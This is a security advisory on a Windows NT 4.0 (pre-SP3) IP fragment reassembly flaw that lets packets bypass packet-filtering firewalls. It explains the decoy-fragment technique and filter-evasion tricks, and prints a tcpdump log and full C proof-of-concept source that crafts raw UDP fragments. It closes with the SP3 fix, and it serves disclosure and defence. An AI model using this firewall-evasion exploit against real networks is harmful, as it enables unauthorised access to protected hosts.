COMMAND

    fragmentation attack

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    Thomas Lopatic  found following.   Windows NT  4.0 (up  to Service
    Pack 2) hosts which are  protected by a packet filtering  firewall
    are vulnerable to a new kind of fragmentation attack. Details  are
    taken from http://www.dataprotect.com/ntfrag/

    The  attack  affects  Windows  NT  4.0  hosts (up to and including
    Service Pack 2)  that are protected  by a firewall  which is based
    on packet  screening. Stateful  inspection firewalls  may also  be
    concerned,  depending   on  their   implementation.   Using   this
    weakness, an  outsider is  able to  pass IP  datagrams through the
    firewall to the Windows  NT host, i.e. access  the host as if  the
    firewall did not exist.

    When  reassembling   a  fragmented   IP  packet,   the   Microsoft
    implementation  does  not  require  the  first fragment to have an
    offset value of zero.   It merely checks, whether  the sum of  the
    lengths of the collected fragments equals the total length of  the
    original unfragmented  IP packet.  If enough  fragments have  been
    received so that this condition  holds, the NT stack will  happily
    reassemble what it has got so far.

    So -  how does  it know  about the  total length  of the  original
    packet?   Since, during  normal operation,  all fragments  but the
    last  have  the  MF  (more  fragments)  bit set, Microsoft's stack
    waits until it has  received a fragment F  without the MF bit  and
    then reasons  that the  length of  the unfragmented  datagram must
    have been  offset of  F +  length of  F. Apparently Microsoft have
    tried to  be particularly  efficient since  this method  is faster
    than  traversing  the  whole  list  of  fragments  to  check   for
    completeness.

    Thomas illustrated  this mechanism  with an  example. Say  that we
    have  an  original  packet  of  48  bytes  which  we send as three
    fragments F1,  F2 and  F3, each  with a  length of  16 bytes.  Now
    suppose  that  they  arrive  out  of  order, first F2, then F3 and
    eventually  F1.   The  following  table  shows  NT's notion of the
    total packet length after each fragment has arrived.

    Fragment #Offset Length MF bit Total Length           Data Collected

    F2        16     16     1   0 (no change, since MF 16 = 1)   16

    F3        32     16     0   48 (= offset + length = 32 + 16) 32

    F1        0      16     1   48 (no change, since MF = 1)     48

    After Total  Length equals  Data Collected,  the IP  stack decides
    that it  has received  all fragments  and starts  reassembling. To
    exploit this goodie  courtesy of Microsoft,  we will clear  the MF
    bit on  another fragment.  Suppose we  send another  two fragments
    F1, and F2 as follows.

    Fragment #Offset Length MF bit Total Length    Data Collected

    F1        16     16     0      32      16 (= offset + length = 16 + 16)

    F2        32     16     1      32      (MF = 1, no change)

    We have just sent  two fragments, none of  which has an offset  of
    zero, yet  the NT  protocol stack  will correctly  reassemble them
    into a 32 byte IP packet.

    Exploiting this feature is a bit more complicated than it seems at
    first  sight.  Since  the  IP  stack  stores  the  IP  header of a
    fragment (to use it later for the reassembled packet) if and  only
    if its offset is  zero, we must send  a decoy packet first,  which
    must be  carefully crafted  so that  it will  be stored at exactly
    the  same  memory  location  as  our  next  packet,  which  is the
    malicious  one  without  the  zero-offset-fragment.  So, the bogus
    datagram will reuse the header information of our first datagram.

    Imagine  that  we  would  like  to  attack  a  WWW server behind a
    firewall.  Then we  would send one decoy  to port 80, a  malicious
    packet to 23,  another decoy to  port 80, another  bogus packet to
    port  23,  etc.  In  this  way  we  can establish a telnet session
    through the packet screen.

    But what do we do when we hit a packet screen (e.g. screend) which
    requires for each fragmented packet  a fragment with an offset  of
    zero to be present? We send  such a fragment and simply give  it a
    time  to  live  that  is  short  enough  so that it will reach the
    firewall but never the  destination host. Another option  would be
    to insert an invalid checksum into  its IP header so that it  will
    be dropped at the destination host.

    In order to back up the  above theory with an example, Thomas  has
    written a short program which  sends a decoy UDP datagram  to port
    9 (discard) of his NT  system and after that another  UDP datagram
    to  port  7  (echo).   He  used  port  255 as the source port. The
    program runs on  NetBSD 1.2 and  should be easily  portable to any
    BSD  system  featuring  the  Berkeley  Packet  Filter. Here is the
    output of tcpdump after an example run.

    bob:/usr/home/tl# tcpdump
    tcpdump: listening on ed0
    01:54:38.751853 bob.255 > alice.discard: udp 248 (frag 256:256@0+)
    01:54:38.752252 bob > alice: (frag 256:256@256)
    01:54:38.752645 bob > alice: (frag 512:256@256)
    01:54:38.753054 bob > alice: (frag 512:256@512+)
    01:54:38.755716 alice.echo > bob.255: udp 248
    01:54:38.755992 bob > alice: icmp: bob udp port 255 unreachable
    ^C
    6 packets received by filter
    0 packets dropped by kernel
    bob:/usr/home/tl#

    As  can  be  easily  seen,  responds  (line  seven  in  the  above
    paragraph) to the  two fragments sent  by bob (lines  five and six
    in the above paragraph). The first two fragments (lines three  and
    four) make  up the  decoy packet.  Eventually, alice  gets an ICMP
    message, since  bob does  not have  any service  listening at port
    255.  The  source code for  this little demo  program is available
    below.

    /*
       This  programs  demonstrates  a  new  kind  of fragmentation attack
       involving Windows NT 4.0  hosts behind packet filtering  firewalls.
       See http://www.dataprotect.com/ntfrag/ for details on this attack.

       It should compile cleanly on any BSD system which has the  Berkeley
       Packet Filter installed and has  been tested on NetBSD 1.2  against
       a Windows NT 4.0 (SP2) host.

       OpenBSD patches provided by Theo de Raadt <deraadt@cvs.openbsd.org>

       SERVICE PACK 3 FIXES THIS PROBLEM! INSTALL IT - NOW!

       Thomas Lopatic (thomas@dataprotect.com), 970709
    */

    #include <sys/types.h>
    #include <netinet/in_systm.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/ip_icmp.h>
    #include <netinet/udp.h>
    #include <sys/socket.h>
    #include <sys/time.h>
    #include <sys/errno.h>
    #include <fcntl.h>
    #include <sys/ioctl.h>
    #include <net/bpf.h>
    #include <net/if.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <arpa/inet.h>
    #include <string.h>
    #include <unistd.h>

    char bpf_dev[] = "/dev/bpf1";   /* the BPF device to use */
    char inter[] = "ed0";           /* the ethernet device we'll attach to */
    char src[] = "172.16.0.2";      /* our address */
    char dest[] = "172.16.0.1";     /* the target system's address */
    int sport = 255;                /* the source port for the UDP datagram */
    int dport = 9;                  /* the decoy destination port */
    int real_dport = 7;             /* the real destination port */

    u_short calc_sum(u_short start, u_short *buff, int len)
    {
      u_long sum = start;

      while (len--)
	sum += *buff++;

      sum = (sum >> 16) + (sum & 0xffff);
      sum = (sum >> 16) + (sum & 0xffff);

      return sum;
    }

    void dump_hex(u_char *buffer, int size)
    {
      int i, off = 0;

      while (off < size) {
	printf("%.4x:", off);
	for (i = 0; i < 16 && i + off < size; i++)
	  printf(" %.2x", buffer[i + off]);
	printf("\n");
	off += i;
      }
    }

    int main(int ac, char *av[])
    {
      int i, s, k, bpf, res = 0, true = 1;
      unsigned char dgram[276];
      union {
	unsigned long l[3];
	unsigned short s[6];
	unsigned char c[12];
      } pseudo;
      struct ip *iph;
      struct udphdr *udph;
      struct sockaddr_in daddr;
      struct timeval to = {0, 500000};
      int blen;
      u_char *bbuff;
      struct ifreq req;
      struct bpf_hdr *bhdr;

      if (getuid()) {
	printf("you must be root to use this program\n");
	return 12;
      }

      if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
	perror("socket");
	res = 1;
      } else {
	if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &true, sizeof(true)) < 0) {
	  perror("setsockopt");
	  res = 2;
	} else if ((bpf = open(bpf_dev, O_RDWR)) < 0) {
	  perror("open");
	  res = 3;
	} else {
	  if (ioctl(bpf, BIOCGBLEN, &blen) < 0) {
	    perror("ioctl(BIOCGBLEN)");
	    res = 4;
	  } else if ((bbuff = malloc(blen)) == NULL) {
	    perror("malloc");
	    res = 5;
	  } else {
	    strcpy(req.ifr_name, inter);
	    if (ioctl(bpf, BIOCSETIF, &req) < 0) {
	      perror("ioctl(BIOSETIF)");
	      res = 6;
	    } else if (ioctl(bpf, BIOCSRTIMEOUT, &to) < 0) {
	      perror("ioctl(BIOCSRTIMEOUT)");
	      res = 7;
	    } else {
	      daddr.sin_len = sizeof(daddr);
	      daddr.sin_family = AF_INET;
	      daddr.sin_port = dport;
	      daddr.sin_addr.s_addr = inet_addr(dest);

	      for (i = 0; i < sizeof(dgram); dgram[i++] = 0);
	      for (i = 0; i < 3; pseudo.l[i++] = 0);

	      iph = (struct ip *)&dgram[0];
	      udph = (struct udphdr *)&dgram[20];

	      iph->ip_v = IPVERSION;
	      iph->ip_hl = 5;
    #ifdef __OpenBSD__
	      iph->ip_len = htons(276);
    #else
	      iph->ip_len = 276;
    #endif
	      iph->ip_id = 1;
	      iph->ip_ttl = 255;
	      iph->ip_p = pseudo.c[9] = IPPROTO_UDP;
	      iph->ip_src.s_addr = pseudo.l[0] = inet_addr(src);
	      iph->ip_dst.s_addr = pseudo.l[1] = inet_addr(dest);

	      /*
		offset = 0, length = 256, MF = 1
	    -> total length is not affected by this fragment    
	      */

    #ifdef __OpenBSD__
	      iph->ip_off = htons(0x2000);
    #else
	      iph->ip_off = 0x2000;
    #endif
	      iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);

	      udph->uh_sport = ntohs(sport);
	      udph->uh_dport = ntohs(dport);
	      udph->uh_ulen = pseudo.s[5] = ntohs(256);
	      udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,128);

	      /* send the first half of the decoy */

	      if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
			 sizeof(daddr)) < 0) {
		perror("sendto");
		res = 8;
	      }

	      /*
		offset = 256, length = 256, MF = 0
		 -> total length is set to 512 by this fragment
	      */

    #ifdef __OpenBSD__
	      iph->ip_off = htons(32);
    #else
	      iph->ip_off = 32;
    #endif
	      iph->ip_sum = 0;
	      iph->ip_sum = calc_sum(0, (u_short *)iph, 10);
	      for (i = 20; i < 276; dgram[i++] = 0);

	      /* send the second half of the decoy */

	      if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
			 sizeof(daddr)) < 0) {
		perror("sendto");
		res = 9;
	      }

	      iph->ip_id++;
	      iph->ip_sum = 0;
	      iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);

	      udph->uh_sport = ntohs(sport);
	      udph->uh_dport = ntohs(real_dport);
	      udph->uh_ulen = pseudo.s[5] = ntohs(256);
	      udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,128);

	      /*
		 send the first half of the real datagram
		 we have kept the offset settings from above
		 offset = 256, length = 256, MF = 0
		 -> total length is set to 512 by this fragment
	      */

	      if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
			 sizeof(daddr)) < 0) {
		perror("sendto");
		res = 10;
	      }

	      /*
		 offset = 512, length = 256, MF = 1
		 -> total length is not affected
	      */

    #ifdef __OpenBSD__
	      iph->ip_off = htons(0x2040);
    #else
	      iph->ip_off = 0x2040;
    #endif
	      iph->ip_sum = 0;
	      iph->ip_sum = calc_sum(0, (u_short *)iph, 10);
	      for (i = 20; i < 276; dgram[i++] = 0);

	      /* send the second half of the real datagram */

	      if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
			 sizeof(daddr)) < 0) {
		perror("sendto");
		res = 11;
	      }
	    }
	    free(bbuff);
	  }
	  close(bpf);
	}
	close(s);
      }
      return res;
    }

SOLUTION

    This problem has  been fixed in  SP3. This Service  Pack fixes the
    problem mentioned  above. It  introduces a  check, whether  the IP
    stack  has  seen  a  fragment  with  an  offset  of  zero,  before
    reassembly is done.